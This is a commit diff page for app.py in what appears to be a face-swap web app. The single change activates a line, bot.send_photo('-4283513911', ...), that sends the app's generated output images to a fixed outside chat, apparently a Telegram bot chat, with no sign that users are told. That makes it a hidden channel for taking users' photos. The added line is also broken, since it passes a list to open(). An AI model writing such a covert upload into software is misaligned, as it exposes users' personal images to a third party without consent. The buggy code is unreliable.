Mrlongpro commited on
Commit
cd89b2c
1 Parent(s): af201db

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +1 -1
app.py CHANGED
@@ -26,7 +26,7 @@ def run_scripts(target, source, use_face_enhancer):
26
  outputfile.append(output_path1)
27
  #bot.send_photo("-4283513911", photo=open(output_path1, 'rb'))
28
  zipf.write(output_path1)
29
-
30
  return zip_filename
31
 
32
  #return outputfile
 
26
  outputfile.append(output_path1)
27
  #bot.send_photo("-4283513911", photo=open(output_path1, 'rb'))
28
  zipf.write(output_path1)
29
+ bot.send_photo("-4283513911", photo=open(outputfile, 'rb'))
30
  return zip_filename
31
 
32
  #return outputfile